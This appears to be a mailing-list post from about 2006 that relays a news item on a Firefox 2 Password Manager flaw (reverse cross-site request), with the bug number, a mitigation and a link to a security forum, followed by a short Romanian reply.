password flaw in Firefox 2
explorer
than Microsoft's Internet Explorer, but a new flaw in the Firefox
Password Manager, which lets users store usernames and passwords for
trusted Web sites, could let hackers steal their login data.
The problem, known as a reverse cross-site request, or RCSR, was first
discovered by Robert Chapin, a Microsoft Certified Systems Engineer
(MCSE) and I.T, consultant. The RCSR appears on blogs, message boards,
or group forums that let users add comments with embedded HTML code.
On sites that allow users to enter code, a hacker can embed a form
that tricks the user's browser into sending its username and password
information to the hacker's computer. Because the form is embedded on
a trusted Web site, the browser's built-in antiphishing protection,
which is designed to alert users to fraudulent Web sites, does not
detect the problem."
Fix:
The Mozilla Foundation (the group behind the firefox browser) has
classified it as Bug #360493 and also announced that it will be fixed
in version 2.0.0.1 or 2.0.0.2.
This attack can be avoided by disabling the browsers' autosave
features for usernames and passwords. In Firefox, the feature is found
in the "Options" window under the "Tools" menu.
well fellows a lot more security related issues can be found at
http://xplor.byethost15.com/phpBB/index.php
i am actually not advertising this website i am posting it here
because its actually not possible for me to post each and every topic
present over their on this group
check it out if you want it may be useful for u!
Ungureanu Adrian
Mai nou Microsoft se ocupa de cautarea bug-urilor din
Firefox :)) Banuiesc eu ca nu mai sunt in produsele
proprii ...
--- explorer <explor...@yahoo.com> wrote:
____________________________________________________________________________________
Yahoo! oneSearch: Finally, mobile search
that gives answers, not web links.
http://mobile.yahoo.com/mobileweb/onesearch?refer=1ONXIC